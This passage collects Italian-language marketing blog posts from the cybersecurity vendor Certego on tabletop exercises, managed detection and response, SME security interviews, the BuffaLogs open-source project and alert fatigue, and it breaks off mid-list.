Confrontarsi con altri CISO e responsabili della sicurezza significa anche imparare a pensare in modo più strategico. Si comprendono meglio le priorità, le dinamiche decisionali, la gestione della pressione e dell’incertezza. È un esercizio che allena non solo la prontezza tecnica, ma la capacità di costruire fiducia, coordinamento e collaborazione. La sicurezza, dopo un tabletop, appare meno come un insieme di procedure e più come un ecosistema di persone e relazioni.

Dal gioco alla realtà

Il tabletop è spesso descritto come un “gioco di ruolo”, e in parte lo è: si parte da uno scenario, si discutono decisioni, si reagisce a sviluppi imprevisti. Ma è un gioco estremamente serio, perché prepara alla realtà. Durante la simulazione, un facilitatore — il game master — guida la sessione, introduce nuovi eventi (“injects”) e stimola i partecipanti a decidere in gruppo. I team vengono divisi in tavoli di lavoro e si trovano a valutare insieme come reagire. Alla fine, si confrontano i risultati, si discutono le scelte e si riflette su come ciascuno ha gestito la crisi.

È un’esperienza dinamica e coinvolgente che permette di allenarsi a decidere meglio prima che arrivi il momento di farlo davvero. E quando ci si trova di fronte a una vera emergenza, quell’esperienza condivisa — la memoria delle decisioni prese insieme — diventa un vantaggio competitivo.

In conclusione

Un tabletop di cybersecurity non serve solo a testare procedure o piani di risposta: è un acceleratore di maturità organizzativa e professionale. È l’occasione per confrontarsi con pari ruolo, condividere esperienze, mettere in discussione convinzioni e migliorare concretamente la propria capacità di gestire una crisi.

È un momento di scambio, di apprendimento reciproco e di crescita collettiva — dove ogni partecipante si mette alla prova e, nel farlo, arricchisce anche gli altri. Perché, in fondo, la vera forza della sicurezza non sta solo nelle tecnologie, ma nella capacità delle persone di decidere insieme, con lucidità e fiducia, quando il tempo stringe e le certezze vacillano.

Il fattore umano nell’MDR

Pier Giorgio Bergonzi, Product Marketing — Mon, 10 Nov 2025 23:00:00 GMT

Quando si parla di servizi di Managed Detection and Response (MDR), è naturale pensare subito alla componente tecnologica: piattaforme di analisi avanzata, motori di correlazione, algoritmi e integrazioni con sistemi EDR, SIEM o NDR. Ed è comprensibile: la tecnologia rappresenta la base operativa che consente di rilevare, analizzare e rispondere in tempo reale alle minacce, ma anche lo strumento che ottimizza il lavoro dei team di sicurezza, rendendo i processi più efficaci ed efficienti.

Ma — e questo è un “ma” importante — la tecnologia, per quanto sofisticata, da sola non basta. Senza l’intuito, l’esperienza e la capacità di giudizio delle persone, anche le piattaforme più avanzate rischiano di restituire solo dati, non risposte.

Un servizio MDR è davvero efficace quando il valore delle tecnologie è affiancato da un team di professionisti esperti, capace di interpretare i segnali, distinguere un falso positivo da un attacco reale e prendere decisioni tempestive nei momenti critici. In definitiva, l’MDR migliore è quello in cui l’intelligenza delle tecnologie incontra la competenza delle menti più preparate.

Esperienza: anni vissuti sul campo, non solo di servizi

Nel mondo della cybersecurity, l’esperienza non è un numero: è un patrimonio.

Un SecOps team che opera da anni nel campo ha affrontato attacchi reali di natura diversa: ransomware, intrusioni APT, compromissioni cloud, data breach, etc. Ha imparato a riconoscere schemi ricorrenti, a creare playbook di risposta e ha sviluppato la sensibilità per individuare ciò che ancora non è documentato.

Più anni di attività significano anche maggiore esposizione alla ricerca di nuove minacce: analisi di malware emergenti, reverse engineering di payload sconosciuti, studio di nuove tecniche di evasione e persistence, osservazione dei comportamenti dei cybercriminali e adattamento continuo delle strategie di difesa. Tutto questo forma un bagaglio di conoscenze che nessun software può sostituire.

Quando valuti un provider MDR analizza la struttura e la maturità del suo Security Operations Team. Chiediti da quante persone è composto il team, quante di queste hanno un profilo senior o specialistico e quante ore-uomo di analisi vengono gestite ogni. Un altro indicatore importante è il numero di incidenti reali affrontati e risolti e la capacità di eseguire post-incident review, perché ogni esperienza sul campo contribuisce ad affinare la capacità di risposta e a migliorare i processi interni.

Certificazioni: la garanzia di competenze verificate

Le certificazioni internazionali sono un segnale tangibile di qualità. Non si tratta solo di “bollini”, ma di attestazioni ottenute attraverso percorsi rigorosi di formazione, verifica e aggiornamento continuo. Un team di Security Operations ben strutturato dovrebbe annoverare tra le proprie competenze alcune delle certificazioni più riconosciute nel settore, come ad esempio:

ISC2 Certified Information Systems Security Professional (CISSP)
GIAC Cloud Security Automation (GCSA)
GIAC Exploit Researcher and Advanced Penetration Tester (GXPN)
GIAC Penetration Tester (GPEN)
ISECOM OSSTMM Professional Security Tester (OPST)

Quando valuti un provider MDR, chiedi quanto investe nella formazione del proprio team: quante ore-uomo vengono dedicate ogni anno all’aggiornamento professionale, quante certificazioni vengono conseguite o rinnovate, e come viene monitorata la crescita delle competenze interne.

Verifica anche se l’azienda segue framework di riferimento come MITRE ATT&CK, NIST o ISO 27035 nei processi di detection e incident response.

Un provider MDR che investe costantemente in questo ambito dimostra una cosa fondamentale: la sicurezza è una cultura, non solo un servizio.

Diversi ruoli e competenze: la forza di un team eterogeneo

Un Security Operations Center (SOC) efficace non è composto solo da analisti di cybersecurity.

Le minacce moderne richiedono un mix di competenze complementari, in grado di coprire ogni fase della catena d’attacco — dalla prevenzione alla risposta, fino all’analisi post-evento — supportate da una consulenza continua che accompagna il cliente nel miglioramento e nell’adattamento costante delle difese, oltre che nella piena valorizzazione del servizio.

Oltre agli analisti di primo e secondo livello, un team di Security Operations dovrebbe includere:

Incident Responder, in grado di coordinare e contenere un attacco attivo, gestendo la crisi con tempestività;
Threat Researcher, che studiano nuove campagne malevole, creano signature di detection e aggiornano costantemente i playbook;
Digital Forensic Analyst, specializzati nell’individuare tracce digitali, analizzare artefatti di memoria e ricostruire la dinamica di un attacco;
Detection Engineer, che sviluppano regole di correlazione, alert tuning e automazioni nei sistemi EDR e SOAR per ridurre i falsi positivi;
Threat Hunter, che non aspettano gli alert, ma li anticipano cercando indicatori di compromissione (IOC) e comportamenti anomali all’interno dei sistemi aziendali.
Customer Service Specialist, che rappresentano il punto di contatto continuo con il cliente, facilitando la comunicazione, coordinando le attività operative e assicurando che le esigenze specifiche siano comprese e trasformate in azioni concrete per migliorare la postura di sicurezza.

Un team eterogeneo è un team capace di osservare la minaccia da più prospettive — tecnica, strategica, investigativa — e di rispondere con rapidità, precisione e visione proattiva, fornendo indicazioni preziose per rafforzare costantemente le difese aziendali.

Conclusione

La forza di un servizio MDR risiede nell’equilibrio tra tecnologia all’avanguardia e competenze umane di alto livello. Un provider che investe nelle persone, nella formazione continua e in processi di detection ingegnerizzati secondo standard internazionali non offre solo reattività, ma resilienza. Perché, alla fine, anche nell’era dell’automazione, la differenza la fanno ancora le persone — quelle che sanno leggere un log come un indizio, e un allarme come un’opportunità per migliorare la difesa.

Oltre il rilevamento e la risposta

Pier Giorgio Bergonzi, Product Marketing — Mon, 20 Oct 2025 22:00:00 GMT

Per molte aziende, la domanda non è più se investire in sicurezza, ma come farlo in modo sostenibile. Costruire un SOC interno o affidarsi a un servizio MDR non è solo una scelta tecnologica: è una decisione strategica che influenza la capacità dell’organizzazione di maturare nel tempo.

Secondo il 2024 Designing and Building Modern Security Operations Survey di Gartner, il 92% dei leader di sicurezza dichiara di conoscere e comprendere la funzione SecOps della propria organizzazione. Tuttavia, la consapevolezza non basta: tra conoscenza e reale maturità operativa c’è ancora un divario significativo. Molte realtà faticano a sviluppare un SOC realmente efficace a causa di vincoli di risorse, entropia decisionale e sovraccarico operativo. In altre parole, team sovraccarichi di lavoro ma con risultati inferiori alle aspettative. È un limite strutturale che rende difficile mantenere nel tempo capacità di monitoraggio 24/7, risorse L1-L3 dedicate e processi di incident response sempre aggiornati.

Un SOC interno può trasmettere la sensazione di un controllo più diretto e di una maggiore autonomia, ma richiede una struttura complessa: analisti operativi 24/7, piattaforme tecnologiche e processi di risposta e aggiornamento continuo. È un modello che funziona bene solo quando c’è massa critica e disponibilità costante di competenze, risorse e tempo. E proprio qui si manifesta la sfida più grande: mentre le organizzazioni puntano a far evolvere la propria funzione SecOps, spesso si trovano intrappolate in un sistema che consuma più energia di quanta ne restituisca in valore.

L’MDR come leva di maturazione

Un servizio MDR evoluto non si limita a rilevare e rispondere agli incidenti: accelera la crescita della postura di sicurezza aziendale. Ogni alert gestito, ogni indagine condotta, ogni raccomandazione condivisa diventa un’occasione di apprendimento.

Grazie alla visione trasversale maturata su centinaia di ambienti diversi, gli analisti MDR portano prospettive e best practice che un SOC interno, isolato nella propria esperienza, faticherebbe a sviluppare. Questo significa trasformare gli eventi di sicurezza in momenti di consapevolezza, capaci di migliorare configurazioni, processi e comportamenti. Nel tempo, il rapporto con la sicurezza cambia natura: da “servizio gestito” a partnership strategica che evolve insieme all’azienda.

Come osserva Gartner, sempre nella Designing and Building Modern Security Operations Survey, integrare threat hunting, operational threat intelligence e digital forensics rappresenta una delle cinque iniziative con il miglior ROI per i prossimi due-tre anni: attività fondamentali per reagire più velocemente alle minacce e rendere la difesa più proattiva. Un MDR maturo incorpora già questi elementi, aiutando le organizzazioni a colmare il gap di maturità senza sovraccaricare i team interni.

La forza dello stack tecnologico

Un altro elemento chiave che distingue un MDR maturo è la tecnologia su cui si basa. Quando il provider sviluppa e integra un proprio stack tecnologico, ottimizzato per la detection, la correlazione, l’applicazione di dati di threat intelligence e la risposta, l’azienda cliente beneficia non solo di un servizio, ma di un ecosistema e di una architettura tecnologica in continua evoluzione. Questo porta vantaggi concreti:

Accesso a soluzioni avanzate che un singolo SOC interno difficilmente potrebbe implementare o mantenere autonomamente.
Aggiornamenti e miglioramenti continui, frutto dell’esperienza cumulata su più ambienti e dell’analisi di minacce reali.
Integrazione fluida con i sistemi esistenti, grazie a un approccio progettato per adattarsi a realtà eterogenee, on-premise o cloud.
Metriche e visibilità centralizzata, che permettono di misurare nel tempo la maturità della postura di sicurezza.

In questo modo, lo stack tecnologico dell’MDR diventa una leva di crescita condivisa: ciò che viene appreso in un ambiente viene trasferito e tradotto in miglioramenti per tutti i clienti. L’azienda non compra una “soluzione statica”, ma entra in un ecosistema che evolve insieme alle minacce — e quindi anche insieme al proprio livello di maturità.

La forza dell’esperienza condivisa

Dietro un servizio MDR ci sono analisti ed esperti di cybersecurity certificati che vivono ogni giorno la realtà del contrasto agli attacchi: GCIA, GCIH, OSCP, CISSP — non solo titoli, ma esperienza concreta accumulata su centinaia di incidenti, investigazioni forensi e attività di threat hunting. Lavorando in team multidisciplinari, questi professionisti mettono a fattore comune ciò che apprendono da ogni caso. Il risultato? Il cliente non riceve solo una risposta tecnica, ma un trasferimento continuo di conoscenza che si traduce in processi più solidi, policy più efficaci e decisioni più informate.

Il vantaggio che resta nel tempo

Mentre un SOC interno deve continuamente dimostrare di poter mantenere il ritmo di evoluzione delle minacce, un MDR cresce costantemente insieme al proprio ecosistema di intelligence, strumenti e competenze. Per l’azienda, questo significa maturare senza rallentare:

Visibilità e risposta sempre aggiornate alle nuove minacce.
Raccomandazioni concrete per migliorare la postura di sicurezza.
Un ciclo virtuoso di apprendimento continuo che consolida la resilienza organizzativa.

La sicurezza non rappresenta un centro di costo, ma un fattore di crescita che aumenta la fiducia, la prontezza e la capacità decisionale del business.

Affidarsi a un MDR con esperti di cybersecurity eterogenei e certificati e una architettura tecnologica proprietaria: significa abbracciare un modello di sicurezza che evolve con l’azienda: proattivo, condiviso e capace di trasformare ogni possibile minaccia in un passo avanti verso la maturità.

Threat Intelligence - Vulnerability insights

Thu, 02 Oct 2025 22:00:00 GMT

Una delle principali sfide per i team di sicurezza informatica è l'implementazione di politiche efficaci di gestione delle minacce, fondamentali per prioritizzare la correzione delle vulnerabilità più pericolose.

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di ottobre 2025, identificate dal nostro team di Threat Intelligence.

La ricerca è stata condotta mediante l’utilizzo di Quokka, la piattaforma proprietaria di Threat Intelligence di Certego, che svolge il ruolo cruciale di identificare, monitorare e correlare le minacce, inclusi i tentativi di sfruttamento delle vulnerabilità tramite indirizzi IP.

I tentativi di sfruttamento indicati nel report sono stati rilevati attraverso i sensori dislocati presso le infrastrutture dei clienti Certego e le honeypots, sia proprietarie che di terze parti, che consentono di analizzare le tecniche di attacco dei cybercriminali in modo sicuro.

Il report si propone di fornire una visione chiara delle tendenze emergenti in termini di minacce alla sicurezza, offrendo spunti per lo sviluppo di strategie di mitigazione rapide ed efficaci, nonché per la risoluzione delle vulnerabilità più critiche.

Compila il form e ricevi il PDF

Cybersecurity nelle PMI

Wed, 01 Oct 2025 22:00:00 GMT

Sommario

Cybersecurity nelle PMI: lo scenario - A cura di Certego
- Perché investire conviene
- Dalla difesa passiva alla risposta proattiva
Cybersicurezza nelle PMI italiane: consapevolezza, criticità e strumenti per affrontare le nuove sfide digitali - Intervista con Francesco Napoli, Vice Presidente nazionale di CONFAPI
Cybersicurezza e infrastrutture: strategie, sfide e buone pratiche nel settore dei cantieri stradali - Intervista con l’Avv. Icilio Polidoro, referente Affari Legali di Divisione Cantieri Stradali S.p.A

1. Cybersecurity nelle PMI: lo scenario - A cura di Certego

Negli ultimi anni il panorama digitale delle PMI italiane si è trasformato in profondità: la crescente adozione di tecnologie, l’uso massiccio di dispositivi connessi (endpoint, IoT, accessi da remoto) e l’integrazione sempre più stretta con filiere e partner hanno ampliato in modo significativo la superficie d’attacco. In questo contesto, la cybersecurity non è più un’opzione, ma una necessità strategica: la digitalizzazione accelerata — spinta dalla modernizzazione dei processi produttivi e dall’apertura a mercati globali — ha reso le PMI un bersaglio privilegiato per attacchi informatici sofisticati, capaci di compromettere continuità operativa, reputazione e competitività.

Il nostro report semestrale “State of Cybersecurity 2025”, realizzato da Certego in collaborazione con AUSED, evidenzia come le PMI siano ormai uno dei bersagli privilegiati del cybercrime: nei primi sei mesi dell 2025 si registrano 2.314 attacchi, con un incremento del 10%. In altre parole, un attacco informatico su tre in Italia colpisce una piccola o media impresa. Un dato che conferma come la minaccia non interessi più soltanto le grandi realtà, ma si stia estendendo in modo crescente al cuore del tessuto produttivo italiano.

Perché investire conviene

Alcune PMI tendono ancora a considerare la cybersecurity come un costo anziché come un investimento strategico. Si tratta di un errore di prospettiva che può rivelarsi rischioso: un attacco ransomware o una violazione di dati non produce soltanto danni economici immediati, ma può compromettere la continuità operativa, la reputazione e la fiducia del mercato. Il vero costo, quindi, non è quello legato all’adozione di soluzioni di protezione, ma quello derivante dal non essere adeguatamente protetti.

Dalla difesa passiva alla risposta proattiva

In questo scenario, le difese tradizionali non bastano più. Firewall, antivirus e backup sono necessari, ma insufficienti a fronte di minacce sempre più evolute e persistenti. Ciò che serve oggi alle PMI è un approccio proattivo e strutturato, basato su:

Monitoraggio continuo 24/7, per rilevare tempestivamente anomalie e attività sospette;
Detection & Response gestita (MDR), che unisce tecnologie avanzate di rilevamento e il lavoro di team di analisti specializzati;
Formazione del personale, perché le persone sono la prima linea di difesa;
Adozione di best practice di compliance (GDPR, NIS2) come parte integrante della strategia aziendale.

Solo così le PMI possono trasformare la cybersecurity da mero adempimento a vantaggio competitivo.

2. Cybersicurezza nelle PMI italiane: consapevolezza, criticità e strumenti per affrontare le nuove sfide digitali - Intervista con Francesco Napoli, Vice Presidente nazionale di CONFAPI

La trasformazione digitale ha portato le piccole e medie imprese italiane a confrontarsi sempre più spesso con minacce informatiche complesse, in un contesto normativo europeo in costante evoluzione. Nonostante i progressi in termini di consapevolezza, molte PMI continuano a percepire la cybersicurezza come un tema secondario o esclusivamente tecnico, sottovalutando l’impatto reale che un attacco informatico può avere su continuità operativa, reputazione e competitività.

Per fare chiarezza su questi aspetti, abbiamo intervistato Francesco Napoli, Vice Presidente nazionale di CONFAPI (Confederazione Italiana della Piccola e Media Industria Privata), che ci offre una panoramica aggiornata sulle sfide che le PMI stanno affrontando, sulle implicazioni delle normative europee come il GDPR e la direttiva NIS2, e sulle iniziative concrete che l’associazione sta mettendo in campo per supportare il tessuto produttivo nazionale nel percorso verso una maggiore resilienza digitale.

Qual è oggi il livello di consapevolezza delle PMI italiane rispetto ai rischi legati alla cybersicurezza e quali sono le principali minacce?

La consapevolezza è cresciuta negli ultimi anni, anche grazie alla spinta alla digitalizzazione imposta dalla pandemia. Tuttavia, molte PMI continuano a sottovalutare la portata reale delle minacce informatiche. Attacchi ransomware, furto di dati, phishing e violazioni della privacy sono tra i rischi più frequenti. Il problema è che spesso la cybersicurezza viene percepita come una questione tecnica, quando invece deve essere considerata una priorità strategica per la sopravvivenza e la crescita aziendale.

Come viene percepito il rapporto tra costi e benefici nelle soluzioni di cybersecurity da parte degli imprenditori?

Purtroppo molte PMI vedono ancora la cybersicurezza come un costo anziché come un investimento necessario. È un errore di prospettiva. Oggi esistono soluzioni accessibili, scalabili e adatte anche alle piccole realtà. Il rischio reale è quello di non fare nulla: un attacco può bloccare l’operatività di un’azienda, provocare gravi danni economici e colpire duramente la reputazione. È fondamentale che gli imprenditori comprendano che investire nella protezione digitale significa investire nella continuità del proprio business.

Come valutate l’impatto del GDPR e delle normative europee sulla protezione dei dati sulle PMI italiane?

Il GDPR ha rappresentato un cambio di paradigma importante. Ha imposto nuovi obblighi, sì, ma anche portato maggiore consapevolezza sull’importanza della protezione dei dati. Per molte PMI, però, è stato un passaggio complesso, soprattutto per la mancanza di risorse interne e competenze specifiche. Nonostante le difficoltà, riteniamo che il GDPR abbia avuto un effetto positivo, spingendo le imprese a dotarsi di strumenti più adeguati e a introdurre una cultura della responsabilità digitale.

Le PMI sono pronte ad affrontare le nuove direttive europee come la NIS2? Quali sono le criticità?

La direttiva NIS2 rappresenta un’evoluzione importante nel campo della sicurezza informatica, ma per molte PMI è ancora poco conosciuta. Le imprese più strutturate iniziano a muoversi, ma la maggior parte non è ancora pronta ad affrontare pienamente i nuovi obblighi. Le principali criticità sono legate alla complessità delle normative, alla scarsità di competenze interne e all’assenza di una strategia digitale integrata. È quindi fondamentale che le istituzioni e le associazioni di rappresentanza accompagnino le imprese in questo percorso, semplificando l’accesso alle informazioni e offrendo strumenti concreti di supporto.

CONFAPI offre servizi o programmi specifici per aiutare le imprese associate a migliorare la loro sicurezza informatica?

Assolutamente sì. Stiamo lavorando per una "pedagogia digitale" per le piccole e medie imprese, con il preciso obiettivo di proteggere il nostro Made in Italy, che poggia proprio sulle PMI, pilastri fondamentali della nostra economia.

Con questo progetto, CONFAPI intende formare delle vere e proprie "sentinelle digitali" per difendere il nostro ecosistema produttivo. L’obiettivo è sensibilizzare e preparare le piccole e medie imprese ad affrontare le sfide della sicurezza digitale, proteggendo il Made in Italy da minacce e attacchi informatici, garantendo nel contempo la sostenibilità e la crescita delle imprese nell’era digitale. CONFAPI è impegnata a promuovere la cultura della cybersicurezza tra le PMI, attraverso un’ampia gamma di attività formative, consulenziali e informative.

Un esempio significativo è il progetto Microcyber, realizzato in collaborazione con altri partner che ha l’obiettivo di sensibilizzare e formare le micro e piccole imprese sui rischi digitali. Il progetto prevede percorsi didattici mirati, workshop, materiali informativi e attività di supporto operativo per favorire l’adozione di misure efficaci di sicurezza. Oltre a Microcyber, CONFAPI organizza iniziative territoriali, webinar, sportelli di assistenza e collaborazioni con esperti del settore per fornire soluzioni concrete e su misura per le nostre aziende associate.

Quali sono le tre raccomandazioni principali che CONFAPI si sente di dare alle PMI italiane su questo tema oggi?

La prima raccomandazione è non sottovalutare mai il rischio informatico: nessuna azienda, per quanto piccola, è al sicuro. La seconda è formare il personale, perché le persone rappresentano la prima linea di difesa. Un errore umano può aprire la porta a gravi violazioni. La terza è affidarsi a partner e strumenti qualificati, senza improvvisare. La cybersicurezza non è un ambito in cui si può agire con superficialità. CONFAPI è al fianco delle imprese per aiutarle a costruire un approccio consapevole, sostenibile e coerente con le normative europee.

3. Cybersicurezza e infrastrutture: strategie, sfide e buone pratiche nel settore dei cantieri stradali - Intervista con l’Avv. Icilio Polidoro, referente Affari Legali di Divisione Cantieri Stradali S.p.A

In un settore come quello delle infrastrutture stradali, dove la continuità operativa e la protezione dei dati assumono un valore critico, la cybersicurezza è ormai diventata un pilastro strategico per garantire affidabilità, compliance e fiducia. La crescente digitalizzazione dei processi, anche nei contesti più operativi come i cantieri, impone alle aziende del settore un’evoluzione continua sul fronte della sicurezza informatica.

Ne parliamo con l’Avv. Icilio Polidoro, referente Affari Legali di Divisione Cantieri Stradali S.p.A., che ci offre una visione concreta su come l’azienda ha integrato la cybersecurity nelle proprie procedure, affrontando criticità, sviluppando policy interne e promuovendo una cultura aziendale orientata alla resilienza digitale.

Qual è l’approccio attuale dell’azienda alla cybersicurezza?

In Divisione Cantieri Stradali S.p.A. consideriamo la cybersecurity un elemento fondamentale per garantire la continuità operativa e la protezione delle informazioni, non solo interne, ma anche di quelle condivise con i nostri partner e clienti, spesso di livello pubblico e strategico. Da anni ormai, abbiamo adottato un approccio preventivo e strutturato, con policy interne chiare, formazione periodica al personale e il costante aggiornamento dei nostri sistemi informativi. La sicurezza digitale è ad oggi parte integrante della nostra cultura aziendale ed elemento centrale di ogni procedura operativa.

In che modo l’esigenza di integrare la cybersicurezza influisce nella gestione delle risorse e nelle procedure aziendali? Che difficoltà avete riscontrato?

L'integrazione della cybersicurezza nei nostri processi operativi ha richiesto un investimento iniziale importante, soprattutto in termini di formazione del personale e revisione delle procedure. Tuttavia, lo riteniamo un passaggio necessario e coerente con il nostro impegno di operare con senso di responsabilità in un settore strategico come quello delle infrastrutture. La principale difficoltà affrontata ha riguardato, sicuramente, l’allineamento tra il personale operativo nei cantieri e le esigenze della sicurezza digitale, spesso percepita come lontana dal lavoro sul campo.

Che tipo di sistemi di protezione informatica utilizzate?

Utilizziamo una suite integrata di soluzioni di sicurezza informatica: firewall di nuova generazione, servizi gestiti di monitoraggio e risposta in tempo reale del traffico di rete e endpoint e cloud, sistemi di backup giornalieri, sia in locale che in ambienti cloud protetti, con verifiche regolari di integrità e ripristino e crittografia dei dati sensibili e delle comunicazioni, specialmente per i documenti tecnici e i progetti condivisi con i concessionari. Ci tengo a precisare, però, che è solo un inizio e che il nostro impegno sul tema ci porterà a sviluppare ulteriori soluzioni nell’immediato futuro.

Quanto ritenete importante la cybersicurezza per la reputazione dell’azienda e la fiducia dei clienti pubblici o privati?

La cybersicurezza ha un impatto diretto e crescente sulla nostra reputazione e sulla fiducia che i nostri clienti ripongono in noi. Operiamo per conto dei principali concessionari stradali e autostradali italiani, quindi trattiamo dati e progetti sensibili, spesso legati alla sicurezza nazionale o alla mobilità di milioni di cittadini. Riteniamo che essere cyber-resilienti sia un requisito imprescindibile, non solo per ottenere affidamenti, ma anche per dimostrare solidità e affidabilità nel tempo. Per questo riteniamo che investire nella cybersecurity sia parte integrante del nostro impegno per la qualità, la compliance e la sostenibilità operativa.

Google Summer of Code 2025: BuffaLogs cresce, spinto dal talento degli studenti internazionali

Lorena Goldoni, Threat Detection Engineer — Sun, 28 Sep 2025 22:00:00 GMT

BuffaLogs, la soluzione di Authentication Protection integrata nella nostra piattaforma PanOptikon® ha visto quest'anno il contributo di due studenti internazionali, nell’ambito del Google Summer of Code 2025.

Il Google Summer of Code è un’iniziativa globale che promuove l’open-source e l’apprendimento pratico: sostenere giovani talenti e progetti open-source è per noi una priorità, perché arricchisce la community e porta innovazioni concrete alla nostra piattaforma.

BuffaLogs, nato tre anni fa da un mio (Lorena Goldoni) progetto di tirocinio universitario in Certego, è oggi parte della Honeynet Project, una delle più riconosciute organizzazioni no-profit di ricerca in ambito cybersecurity, dedicata a indagare gli attacchi più recenti e a sviluppare strumenti open-source per migliorare la sicurezza di Internet. È proprio grazie a questa appartenenza che BuffaLogs ha potuto partecipare al Google Summer of Code.

I contributi degli studenti hanno riguardato due principali aree: BuffaCLI e il modulo di Alerting

BuffaCLI

BuffaCLI è un nuovo strumento a linea di comando, pensato per rendere BuffaLogs più accessibile e flessibile. Grazie a BuffaCLI, è interrogare i log, esportare i risultati, configurare componenti della piattaforma e integrarsi facilmente con altri strumenti. La sua progettazione modulare garantisce l’estendibilità futura e apre la strada all’integrazione di nuove funzionalità.

Modulo di alerting

Il modulo di alerting di BuffaLogs è stato completamente rivisitato, diventando ricco e versatile:

Nuove integrazioni
Possibilità di inviare notifiche a più canali contemporaneamente
Template personalizzabili per uniformare i messaggi di alert
Raggruppamento degli alert simili per evitare notifiche ridondanti
Generazione di riepiloghi programmati giornalieri o settimanali

Questi interventi hanno reso il sistema più robusto, sicuro e pronto per scenari complessi di monitoraggio.

Il lavoro degli studenti dimostra quanto sia importante sostenere l’open-source e la collaborazione con la community. Investire in progetti open-source permette di combinare formazione, innovazione e contributo concreto a soluzioni tecnologiche che beneficiano tutta la community. Per noi, BuffaLogs non è solo una piattaforma: è anche un esempio di come un progetto open-source possa crescere grazie alla passione, al talento e alla collaborazione tra studenti e professionisti.

Siamo orgogliosi dei risultati raggiunti quest’anno e continueremo a impegnarci per promuovere iniziative che uniscono innovazione, formazione e contributo alla comunità open-source, alimentando il futuro della sicurezza digitale.

Per approfondire

Se vuoi scoprire i dettagli tecnici dei lavori svolti dagli studenti durante il Google Summer of Code, qui trovi gli articoli completi:

GSoC 2025 Project summary. Developing BuffaCLI for Command-Line Management

GSoC 2025 Project summary. BuffaLogs: Alerting Module Enhancement

Troppi allarmi?

Pier Giorgio Bergonzi, Product Marketing — Tue, 23 Sep 2025 22:00:00 GMT

Ogni giorno gli strumenti di monitoraggio generano una mole ingente di alert, ma molti di questi non segnalano vere minacce: sono falsi positivi. Un certo livello di ridondanza è fisiologico, ma quando il numero diventa eccessivo si crea il fenomeno della alert fatigue: più rumore, meno attenzione, tempi di risposta rallentati e priorità confuse.

In questo scenario il rischio è duplice. Da un lato, i team di Security Operations del provider MDR faticano a distinguere i segnali critici in mezzo al rumore, con il pericolo concreto di trascurare gli incidenti davvero importanti. Dall’altro, l’eccesso di falsi positivi ricade anche sul cliente finale, che si trova sommerso da avvisi ridondanti e costretto a lavorare più del necessario, proprio in un’area che un servizio MDR dovrebbe invece sollevarlo dal gestire.

Il paradosso è chiaro: più si lavora, meno si vede ciò che conta davvero. L’attenzione si disperde e il valore che un MDR dovrebbe garantire — rapidità, efficacia e affidabilità — rischia di essere compromesso.

Perché succede e come nasce l’“alert fatigue”

1 - Regole troppo generiche e poco contestualizzate

Molti falsi positivi derivano da regole di soluzioni tecnologiche di terze parti che, pur essendo plausibili, sono pensate per operare in contesti molto eterogenei; per questo non tengono conto del contesto specifico. Una detection progettata per adattarsi a qualsiasi ambiente finisce così per attivarsi anche dove non serve.

Un esempio sono gli EDR tradizionali: strumenti oggi imprescindibili per la sicurezza, ma spesso progettati con logiche di tipo black box. Forniscono regole predefinite pensate per adattarsi a diversi contesti, ma raramente offrono trasparenza sulle modalità di rilevamento. Questo approccio li rende talvolta troppo generici, limitando le possibilità di analisi avanzata e impedendo agli analisti più esperti di analizzare e validare gli allarmi nei tempi migliori.

Quando mancano informazioni chiave come chi, dove, quando e quanto è rilevante, ogni segnale viene trattato come critico per default.

2 - Mancanza di visibilità centralizzata

Molti servizi MDR si basano su un’ampia gamma di strumenti: endpoint, sonde network, cloud, log management, threat intelligence e così via. Se ciascun tool genera alert in modo indipendente, il risultato è un proliferare di duplicati, incongruenze e notifiche che non comunicano tra loro. A questa frammentazione si aggiunge un ulteriore ostacolo: ogni strumento “parla la propria lingua”. Senza una vista unificata, l’analista deve ricostruire manualmente il quadro complessivo, come se stesse componendo un puzzle con pezzi sparsi e incompleti.

Per evitare questo scenario servono tecnologie capaci di correlare eventi e segnali, provenienti da fondi differenti, in un unico ambiente. Solo così diventa possibile distinguere il rumore dagli eventi critici e avere una visione chiara e coerente delle minacce.

3 - Triage troppo manuale (e poca automazione)

Quando gran parte degli alert viene verificata manualmente, gli analisti sprecano minuti preziosi su eventi benigni e il backlog cresce. La differenza la fanno tecnologie che filtrano e aggregano i segnali da fonti diverse e leggono il contesto prima di allertare, applicando IOC e BIOC contestualizzati.

Su questa base, l’automazione del Tier 1 può anche eseguire azioni di contenimento sicure e tracciate — per esempio disabilitare o bloccare un utente e revocare sessioni, isolare un endpoint dalla rete, mettere in quarantena un file e aggiornare regole di firewall — riducendo i tempi di risposta senza togliere controllo agli analisti.

4 - Regole e procedure che non evolvono con minacce e infrastruttura

Le minacce cambiano rapidamente e le infrastrutture dei clienti anche: nuovi servizi, migrazioni cloud, identità e processi che si trasformano. Se le regole restano ferme, il rumore cresce. Serve un approccio di detection engineering continuo: aggiornare IOC e BIOC, ricalibrare soglie e modelli comportamentali, validare e sostituire periodicamente le detection in base alle TTP più recenti e all’evoluzione dell’ambiente. Così le regole restano allineate sia agli attaccanti sia all’operatività reale, riducendo i falsi positivi senza perdere copertura.

Chi paga il prezzo dell’“alert fatigue”?

All’inizio a soffrire è il provider MDR. Il Tier 1 passa ore a scremare segnalazioni incerte, la velocità di risposta cala e l’energia mentale si consuma su verifiche ripetitive. Il Tier 2/Incident Response Team deve rincorrere pezzi di contesto sparsi tra strumenti diversi: quando il rumore è alto, le correlazioni utili si perdono e le indagini si allungano. Il Security Operations Manager, stretto dalle SLA, vede crescere stress e turnover nel team. Così, dentro il provider MDR, la fiducia negli allarmi si erode e il tempo si sposta dalla prevenzione alla gestione del caos.

Questo impatto rimbalza inevitabilmente sul cliente. Un flusso eccessivo di avvisi lo costringe a:

gestire troppe segnalazioni,
sottrarre tempo alle attività strategiche,
subire escalation inutili,
vedere aumentare i costi indiretti,
fare lavoro extra proprio dove l’MDR dovrebbe alleggerire.

In breve: l’alert fatigue è un moltiplicatore di inefficienza, che riduce l’efficacia del servizio e scarica sul cliente un carico ulteriore.

La strategia di Certego

Ridurre i falsi positivi non significa “silenziare” la sicurezza, ma raffinare il segnale: non allertare di meno, bensì allertare meglio. Per questo in Certego abbiamo sviluppato un ecosistema applicativo proprietario, pensato per garantire visibilità completa, correlazione avanzata degli eventi e controllo totale delle tecnologie, senza vincoli di terze parti:

PanOptikon®: la piattaforma unificata di Security Operations che integra tutte le attività di SecOps, dalla visibilità sugli ambienti IT alla gestione degli incidenti end-to-end, con procedure basate sul framework NIST e reportistica conforme alle normative.
